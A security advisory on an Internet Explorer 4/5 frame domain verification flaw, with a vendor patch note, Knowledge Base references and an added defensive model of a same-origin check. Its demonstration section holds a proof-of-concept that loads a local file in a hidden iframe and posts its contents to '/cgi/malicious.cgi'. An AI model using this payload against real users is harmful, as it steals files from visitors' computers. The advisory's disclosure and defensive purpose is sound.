IE Frame Domain Verification

 
Reported May 19 by
Andrew Nosenko

VERSIONS AFFECTED
  • Internet Explorer 4.x
  • Internet Explorer 5.x

    DESCRIPTION

    When a web server opens a frame within a window, the IE security model should only allow the parent window to access the data in the frame if they are in the same domain. However, two functions available in IE do not properly perform domain checking, with the result that the parent window could open a frame that contains a file on the local computer, then read it. This could allow a malicious web site operator to view files on the computer of a visiting user. The web site operator would need to know (or guess) the name and location of the file, and could only view file types that can be opened in a browser window.

    DEMONSTRATION

    <iframe id=clientContent width=0 height=0 noborder>
    </iframe>
    <script for=clientContent event="DocumentComplete(browser)">
    alert (browser.document.body.innerText);

    // browser is an instance of the IWebBrowser COM object

    document.forms[0].elements[0].value = browser.document.body.innerText;
    document.forms[0].submit ();

    </script>

    <script>
    clientContent.navigate("c:\\some_file.txt")
    </script>
    <form action="/cgi/malicious.cgi" method=post onSubmit="window.alert(document.forms[0].elements[0].value); return true">
    <input name="file_text" type=hidden>
    </form>
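
The domain check described above, as an added example (not code from the advisory or from Internet Explorer): a simplified model in which a parent page may read a frame's document only when scheme and host match, and a local path such as the demonstration's c:\some_file.txt is never readable from a page loaded over the network. The function names and the site-a.example / site-b.example URLs are constructed for illustration.

```javascript
// Simplified model of a frame domain check (an assumption, not IE's algorithm).

// Windows drive-letter and UNC paths are not URLs. Map them to file: first,
// otherwise "c:\\some_file.txt" would parse as a URL with the scheme "c:".
function toLocation(target, base) {
  if (/^[a-zA-Z]:[\\/]/.test(target)) {
    return { scheme: "file:", host: "" };
  }
  if (/^\\\\[^\\]+\\/.test(target)) {
    return { scheme: "file:", host: target.split("\\")[2].toLowerCase() };
  }
  const url = new URL(target, base); // relative targets resolve against the parent
  return { scheme: url.protocol, host: url.hostname.toLowerCase() };
}

// True only when the parent document may read the frame's document.
function parentMayReadFrame(parentUrl, frameTarget) {
  let parent, frame;
  try {
    parent = toLocation(parentUrl);
    frame = toLocation(frameTarget, parentUrl);
  } catch (e) {
    return false; // unparseable input: fail closed
  }
  // Local content is never readable from a page loaded over the network.
  if (frame.scheme === "file:" && parent.scheme !== "file:") return false;
  return parent.scheme === frame.scheme && parent.host === frame.host;
}

// Constructed sample targets, evaluated against one constructed parent page.
function evaluateSamples() {
  const parent = "http://site-a.example/index.html";
  const targets = [
    "c:\\some_file.txt",             // the demonstration's navigate() target
    "file:///c:/some_file.txt",      // same file written as a URL
    "\\\\fileserver\\share\\a.txt",  // UNC path
    "/other.html",                   // relative, same site
    "HTTP://SITE-A.EXAMPLE/x.html",  // same site, different case
    "https://site-a.example/",       // same host, different scheme
    "http://site-b.example/",        // different host
  ];
  return targets.map((t) => [t, parentMayReadFrame(parent, t)]);
}

for (const [target, allowed] of evaluateSamples()) {
  console.log((allowed ? "allow " : "deny  ") + target);
}
```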

    VENDOR RESPONSE

    Microsoft has issued a patch for the problem.

    The patches require IE 4.01 Service Pack 2 or IE 5.01 to install. Customers using versions prior to these may receive a message reading "This update does not need to be installed on this system". This message is incorrect. More information is available in KB article Q262509.

    - Frequently Asked Questions: Microsoft Security Bulletin MS00-033,
    http://www.microsoft.com/technet/security/bulletin/fq00-033.asp

    - Knowledge Base article Q262509 discusses the overall patch

    - Knowledge Base articles Q251108 and Q255676 discuss the "Frame Domain Verification" vulnerability

    - Microsoft Knowledge Base article Q258430 discusses the
    "Unauthorized Cookie Access" vulnerability

    - Microsoft Knowledge Base article Q261257 discusses the
    "Malformed Component Attribute" vulnerability

    - Microsoft Knowledge Base (KB) article Q247333,
    Web Proxy Auto-Discovery "Spoofing" May Change Proxy Settings,
    http://www.microsoft.com/technet/support/kb.asp?ID=247333

    - Microsoft TechNet Security web site,
    http://www.microsoft.com/technet/security/default.asp

    CREDITS
    Discovered and reported by Andrew Nosenko
